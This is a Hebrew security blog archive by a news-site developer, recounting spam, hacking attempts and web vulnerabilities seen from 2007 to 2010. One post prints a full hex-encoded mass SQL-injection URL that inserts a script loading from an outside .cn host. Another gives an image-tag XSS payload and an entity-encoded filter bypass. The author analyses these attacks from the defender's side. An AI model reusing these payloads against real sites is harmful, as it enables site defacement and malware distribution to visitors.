וירוסים התחילו לשלוח מיילים מתורגמים

יום שלישי, אוקטובר 5, 2010

קיבלתי את המייל הזה הבוקר, ממשתמש שכנראה נפרצה התיבה שלו בחברת AT&T האמריקאית:   שלום זה נותן לי תענוג גדול לכתוב לך הייתי הגלישה כאשר אני נתקל הפרופיל שלך ו משהו נגע בי ליצור איתך קשר אני אשמח מאוד להיות בקשר עם לך אם יהיה לך את הרצון איתי כדי שנוכל להכיר אחד את השני ולראות מה קרה future.i ישמח מאוד אם תוכל לכתוב לי דרך הדוא"ל שלי עבור לי לספר לך עוד על עצמי ולתת לך תמונה שלי בתור התחלה טובה. אני אהיה מחכה לשמוע ממך. שיהיה לך יום מבורך. מתוך...
תגיות: ,
2 תגובות

האקרים תורכיים ניסו לפרוץ בלילה החולף לאתר ערוץ 7 באנגלית – מעניין

יום שני, ינואר 5, 2009

במהלך הלילה האחרון נעשה נסיון לפרוץ לאתר ערוץ 7 באנגלית כחלק מהמלחמה האלקטרונית המתנהלת בימים האחרונים נגד אתרים ישראליים שונים. במהלך הפריצה ניסה הפורץ (שכמובן נכשל) להשתמש ב-XSS בסיסי (script שמפנה location לדף שלו), וגם להעלות לשרת קבצים בסיומות צד-שרת מגוונות (php, asp.net, asp). מה שהפורץ לא ידע זה שהקבצים עוברים דרך Handler ששולח אותם כמות שהם ללקוח, ולכן הם לא יכולים להזיק חרף הסיומת asp/php/aspx. אין לי כ"כ זמן לפרט איך הסיפור הזה נעשה, אבל הנה הקבצים שהוא העלה לשרת וניסה להריץ: cracker.rar
תגובה אחת

ר"ה תשס"ט: Firefox בעליה; IE7 עבר את 6

יום רביעי, אוקטובר 1, 2008

בעבר היה לי פה נוהל לפיו בכל ראש חודש עברי הצגתי סטטיסטיקה על הגולשים בשוק הרחב של הישראלים. מתישהו מגבלות הזמן הכריעו אותי, אבל לכבוד ר"ה - קצת נתונים. דפדפנים:   Firefox מטפס במהלך חצי השנה האחרונה (אדר ב'-אלול) בחצי אחוז. קצב איטי אבל עקבי ויציב שניכר גם בדו"חות במקומות אחרים. IE מאבד גובה לעבר ה-94.5%, שיא (שלילי) בו לא היה מאז יציאת IE6 לשוק וכנראה הרבה קודם (רק שאז לא היה לי מידע).האמור מדבר כמובן על השוק הישראלי, ולא על זה שבחו"ל שם המצב שונה בתכלית.   השוואת גירסאות של IE: IE6 עדיין תופס...

משתמשים בתפוז לשליחת ספאם

יום שבת, ספטמבר 13, 2008

כת הסטיינטולוגיה, וארגוני החזית שלה עושים מזה שנים שימוש נרחב בספאם להפצת ענייניהם. אם קיבלתם פעם ספאם על החוברת "הדרך אל האושר", או על המלחמה בפסיכיאטרים, או על כל ארגון-חזית אחר של הכת המסוכנת, סביר להניח שאתם מכירים את התופעה המרגיזה.   כמה דקות לאחר צאת שבת חקרתי מעט (כתחביב) את אחת ההודעות שהם שלחו וגיליתי שהם מצאו דרך חדשה להחביא את ההודעות שלהם ממסנני הספאם. הנה:   נגיעה (ובהמשך לחיצה, לאחר שחקרתי היטב שאין שם ריגול אחרי ההקלקות), הביאה אותי לקישור הבא: http://img2.tapuz.co.il/forums/1_90987402.htm   מישהו העלה הודעה לפורומים של תפוז והשתמש בה כדי שהקישור יחמוק ממסנני...
תגובה אחת

נסיון מעניין ל-SQL Injection משולב ב-XSS

יום שבת, אוגוסט 16, 2008

בהרבה מדי דפים שלי אין שימוש בפונקציה TryParse לגבי חלק מהפרמטרים (אלא ב-Cast בסיסי), וכך אני מקבל מדי פעם הודעות שגיאה על נסיונות פריצה אוטומאטיים מעניינים יותר או פחות. הנה הכתובת:http://www.israelnationalnews.com/Subscribe/Preview.aspx?type=1';DeCLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));ExEC(@S); זה כבר מאוד סיקרן אותי. פתחתי את ה-Query Browser וכתבתי כך:select 0x4445434C41.... ובכן, זה מה שמצאתי. לא צריך לדעת לכתוב פרוצדורות שמורות ל-MySQL כדי להבין מה יש כאן:DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) ...
תגיות: , , ,
אין תגובות

חור אבטחה חמור ב-IE

יום שישי, דצמבר 14, 2007

אני משתדל להיות מאוד זהיר. כל קלט שאני מקבל אני בודק ב-7 בעיניים ומוודא שאין שם סקריפטים משום סוג שהוא.תמונות (להבדיל מקישורים), לא עלה בדעתי מעולם לבדוק src של תמונות. ובכן, הדבר הבא, שהופעל נגדי על ידי גולש עובד (IE6/7 על כל מ"ה):<img src=javascript:alert(0)> אבל בכל זאת יש בדיקה של XSS בשרת, אז עקפו אותה בדרך פשוטה להחריד:&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#100&#111&#99&#117&#109& למיטב ידיעתי, אין לחור החמור הזה כרגע פיתרון בדפדפן. כל מע' פורומים וכיוצ"ב שמאפשרת לגולש העלאת תמונות - חשופה.(עוד חורים בסגנון, והדפדפנים עליהם הם רצים: http://ha.ckers.org/xss.html)
תגובה אחת

CSRF – קללה חדשה

יום שבת, דצמבר 1, 2007

אני מקווה שרובכם מכירים את נושא ה-XSS. הקשר שלי לתחום התחיל לפני חמש שנים בדיוק, כשהגעתי מתוך מחקר עצמי למסקנה שניתן לגנוב עוגיות, אבל לא הצלחתי בעזרת הידע המינימלי שהיה לי אז, לנצל אותן לאחר מעשה. הפעם אציג בקצרה קללה חדשה מאותה המשפחה, ואת הדרכים להתגונן מולה. הכוונה ל-CSRF - כלומר Cross Site Request Forgery.גם אליה הגעתי בעצמי, כאשר הגעתי למסקנה שניתן לחזור לשרת תחת העוגיות שלי, בעזרת כמה שיטות פשוטות, וגם ללא JS פעיל ניתן לבצע פעולות בשמי בשרת. חיפוש קצר בגוגל העלה שלא חשבתי ראשון (בלשון המעטה) על הבעיה ויש לה אפילו שם מקצועי.בעבר נתקלתי בבעיה  המימוש הוא פשוט להחריד....
תגיות: , , ,
2 תגובות